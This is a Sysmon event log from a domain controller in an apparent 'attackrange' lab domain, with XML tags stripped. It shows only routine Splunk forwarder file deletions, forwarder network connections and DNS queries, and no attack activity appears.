23542300x80000000000000002202583Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:04:21.881{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=25AD339F0A4B23F21C997AA1B6E139FC,SHA256=DEECBE876613F8F9FBBDD77815D0E6615238CF0041EDD767994519F949FF976D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002202585Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:04:22.882{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A102ED863F57BEE9917FEEEF1FC200D2,SHA256=D935D5F016B2AB114A26FD29A8CEBF7AC10ECC65EA9301AA2E1485723BD1F4FE,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002202584Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:04:22.210{5ABCFE62-842F-603E-1100-00000000AD01}620NT AUTHORITY\LOCAL SERVICEC:\Windows\System32\svchost.exeC:\Windows\ServiceProfiles\LocalService\AppData\Local\lastalive0.datMD5=C8BBF29E0573CD059B3462B0B807F008,SHA256=B745144F26D2C01A6BB4C936542D2795AC19798057E28855303ECEB75408C358,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002202587Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:04:23.897{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5C2F71328278A96990FD79E432FD7A8F,SHA256=C672BFAD9EB7BFD232B20651A5B01B3F7C3B18F0614C7BAD483F65A3E7FCA378,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002202586Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:04:23.163{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=93A6484CFC08AE1D183304115396327C,SHA256=45A17F7A849E7E411732251DFE7B434218382ACFEC5848BA17D84D18CE622214,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002202590Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:04:24.913{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6C5ACF2AD0B02E091D695B48EBFB2E55,SHA256=CF00F612693C2F8726DBACC2FDE2E4D665C9EA6CCC4D69AC53725B54E9BE82C5,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002202589Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:04:24.538{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=4C1E00FB897E60869FA13E722A94CB6B,SHA256=ED94E8D5CE00905858CEBE28C529D4EF3DBA8A5ADF9770B4FF42199C5E4751D5,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000002202588Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:04:19.968{5ABCFE62-84AA-603E-D300-00000000AD01}3788C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-228.attackrange.local60649-false10.0.1.12-8000- 23542300x80000000000000002202591Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:04:25.929{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E722AA7BC5E0BF41C3778EB37164A3FB,SHA256=4FCC639C006AAC11586429093DF84E9322BEFC553D738DFE1445053379F2E851,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002202593Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:04:26.944{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=AB799494322FE89C58666D2FFEF4A3D8,SHA256=A8ACB25AE23B2B827C6FEB878252B313C6146E5FC9FD61C547AB293BF53E68FD,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002202592Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:04:26.897{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=848140D9047159628BE8841212A6A919,SHA256=00E5E89B695E4E1E81674E7BED5EFB86E9572E14A152F92C2C06655016BD3454,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002202594Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:04:27.960{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=83BDFC8854744DC68D59382884690861,SHA256=B00A3A2B0B19C8D82DC25C73D418ADC853E69911E34D0BE666683EABF6F99B07,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002202598Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:04:28.960{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=09DAB90AAA5A36BF592192E3E1EBBEE0,SHA256=4B13EFCCE7A38C510E2F70E06D46A9D7081DC445C0EE711745D07B469FEFAFD2,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000002202597Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:04:24.514{5ABCFE62-843F-603E-2E00-00000000AD01}2300C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-56869- 354300x80000000000000002202596Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:04:23.499{5ABCFE62-843F-603E-2E00-00000000AD01}2300C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-228.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-228.attackrange.local56869- 23542300x80000000000000002202595Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:04:28.225{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=D16D67E3B0F200AF01FF49A78D291251,SHA256=062F58A4DF4BCEF7EB58B83563CFB0F17F02A8E1B634F59772FBA4634B64122B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002202600Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:04:29.975{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9BC345DE1D3FF587C170B868E050F957,SHA256=BCEDA425A02BEF3185E321AE8F29C1C62FD8D39D4A33DE3F1EFC30E9CEAD6AA8,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000002202599Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:04:24.999{5ABCFE62-84AA-603E-D300-00000000AD01}3788C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-228.attackrange.local60650-false10.0.1.12-8000- 23542300x80000000000000002202602Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:04:30.991{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=913421C7EC5DE2ED6CD013CC23CCD687,SHA256=1F78ADB34C9BCE9F8ED6C5143A314741A2AF1580CA1910E66BECEDF4A26CE6DF,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002202601Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:04:30.710{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=A6DF6705FE2C0C1CC28E02BEF1D34460,SHA256=09305698D5E2901FE3964625E3B273E8A66DF904E029C96920BB9B18DB7C0FB2,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000002202604Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:04:27.531{5ABCFE62-843F-603E-2E00-00000000AD01}2300C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudptruetruefe80:0:0:0:0:ffff:ffff:fffe-53146-true2001:500:12:0:0:0:0:d0dG.ROOT-SERVERS.NET53domain 23542300x80000000000000002202603Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:04:32.007{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=CB0F07A8DFB246F08E03DEA968F6AD72,SHA256=01E1AF4775C5C539620311A8390A1326717B7BB002AF3F8E946FC8FE0EC66B0A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002202606Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:04:33.304{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=4FB667966DC6E2933AA682988FD56687,SHA256=0DA35CC3B77925BE832FA5835436E9B3F4FDA70ABC917C9182CDBAC02E72F8FD,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002202605Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:04:33.022{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=AE164A6886371B2A7A9BE909048B7E0A,SHA256=BB8536E26B653A723B6D8F175B33C6A9BCECB39B33E3D1D705DA5BB6C3DAF3DC,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002202609Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:04:34.788{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=D64C95F27690FF9799FF64C258B81AB2,SHA256=A5510162E0972E1A0D21D5A28E32FE89E65F821F1F8A6930159EF3B5FADDFA9E,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000002202608Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:04:30.015{5ABCFE62-84AA-603E-D300-00000000AD01}3788C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-228.attackrange.local60651-false10.0.1.12-8000- 23542300x80000000000000002202607Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:04:34.022{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=FEB992E254668D3920DDE9856022AB18,SHA256=10C08FE314C55FACE28EC8D1113D6F083B4B48854023135AD54929D81A4C810C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002202610Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:04:35.022{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7B03993AF843EFA9980D0D68FEF808A0,SHA256=FD738CB65108C2B1DBFEAC6F3794F9BC6922C2B3A0E7605742000A578136EEF0,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002202611Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:04:36.038{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=AD3697DE9D4D7217FBFAA392D0811896,SHA256=DF9C0B92E4A2FAF51CBB54DF8D21F20E588B82E335BF7757A0D80F03E81E2603,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002202613Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:04:37.179{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=3C9F69F95FCB3FD8B96EB77A351B10DC,SHA256=E9F7824EE16F0207BD1C7EC711EF09B6B039C57D52FA364F666C4F1CD679C165,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002202612Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:04:37.038{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=2453B1A317EB466CA299B8F2437A6990,SHA256=6BDEB5C2A574814A03271E9EB12D85DB54DFDACF37DEFB2EC093BD0829B27150,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000002202616Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:04:35.062{5ABCFE62-84AA-603E-D300-00000000AD01}3788C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-228.attackrange.local60653-false10.0.1.12-8000- 23542300x80000000000000002202615Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:04:38.241{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=62F2E3A64A4FC66EE21BED76018B8D62,SHA256=887F3E5191A3ED3579BCF7F2DE506B2DF4ACEDD191181D3BF56AE363B6988C2F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002202614Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:04:38.054{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F37C5FFD1518A78BCF2B8B71ADA34C69,SHA256=F76B65A6C9623C1E0D0102F2552C77567829DEB43ED1590162BCFEA0662F5FB1,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002202617Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:04:39.069{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=253690CCBF719DA72E99FD3EBA5BE380,SHA256=6BF020F8380FA1D4C6E5C58534A4286D524B499F0B8CF3642D69CB27A40532C4,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002202618Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:04:40.069{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0D1A5A8C1CA486550A3F7AD656822C7F,SHA256=B75052B7E5375625D6434D9470BF8F010F3C06DF8927298336BFCB0D61A6037C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002202619Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:04:41.085{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=2DA5FB86C3AA22B35FEB7584A2DE8DC2,SHA256=39792201798B7102E04FAD241BC4D0E08D42BDCF74F311071489772CD647F606,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002202620Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:04:42.100{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4312178B7DD3565AF4CC68361E5DF494,SHA256=6D0DBB09F1D2AEAA4FA2BC598D00214818C4D52612529AB08A75CE293BD5D9CC,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000002202624Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:04:40.093{5ABCFE62-84AA-603E-D300-00000000AD01}3788C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-228.attackrange.local60654-false10.0.1.12-8000- 23542300x80000000000000002202623Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:04:43.257{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=8B3A789E6F92AE0A1BB4744713019D61,SHA256=FD40A4A36BADDF6AA0191200886F2069D22E4D0338A3E978ED5CF2DD0DADB0EC,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002202622Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:04:43.257{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=DC1427E43F83B02575D4B0B13D6F45A8,SHA256=C112BE1D8720F70990FEDEA579086AF2FD8C4F684E4F36C7378BE7C9AC47BB6A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002202621Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:04:43.100{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5B02C865FCB6784095A6BD6D211F4409,SHA256=30707B3D218970F31077063355203CD16CF7E68840EBB7B47635B6F0FC01B2DA,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002202625Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:04:44.116{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=763B9252B03B2677AC93890FD339F348,SHA256=2FECB1F05B2473C12B769DF442B79D1E345F5C0E8F4715B0CF8F65AC35DEB869,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002202626Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:04:45.132{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=EAD2A87810F63DA3A478E18946BAA867,SHA256=5BF3D03B743454014D0D13179AEADDB2A7453BF804FB309A8E183EB6BDC56191,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002202627Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:04:46.147{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=BAE68FEAC97E242DF7040C563E99C4D1,SHA256=585962474907E22A2266537E6EA8B517016C6057B753115EBEFFAADE37108213,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002202629Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:04:47.179{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=8B3A789E6F92AE0A1BB4744713019D61,SHA256=FD40A4A36BADDF6AA0191200886F2069D22E4D0338A3E978ED5CF2DD0DADB0EC,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002202628Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:04:47.163{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E729A57E89F16A71ADF7F7F4F22A498C,SHA256=0C6377C37632EA38AC0BB9B88632AEC28B8BAC627E526D482426EEB698B6A380,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002202631Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:04:48.194{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=04BCE81A5512CE44AE3CB43DEB743778,SHA256=DA0A39D6A822758DE98F84D6534950997951713F89241DFCFC4288E94766C0C5,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002202630Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:04:48.179{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=CBE8BFEFA6C0A930CA7E9CCFEDD382F5,SHA256=3837930F77687C50AC371F84DDDFC82D0854C33DEBE09E6B76165D4C0561141E,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000002202633Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:04:45.937{5ABCFE62-84AA-603E-D300-00000000AD01}3788C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-228.attackrange.local60655-false10.0.1.12-8000- 23542300x80000000000000002202632Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:04:49.179{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=472D3C3DC6484DD5734281AE6C473B1E,SHA256=5BB74EC51EC298E8CA4FB9E84C20C0041FFE55A99E42F699BBE15EBE845DB3E5,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002202634Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:04:50.179{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=48FF863FB610936BF81A4EDD51FAC959,SHA256=9544C582A8A3240872BEE9BFAAE9BF7B74BE76058F16BED2C1A2DAA091BBC8FB,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002202636Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:04:51.413{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=B9C2793CD356D43EE699195B00066E7F,SHA256=0B3CD628B65FD8D20AAB3527A094A90EADAC3B316FF415DE0B39CE293633283D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002202635Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 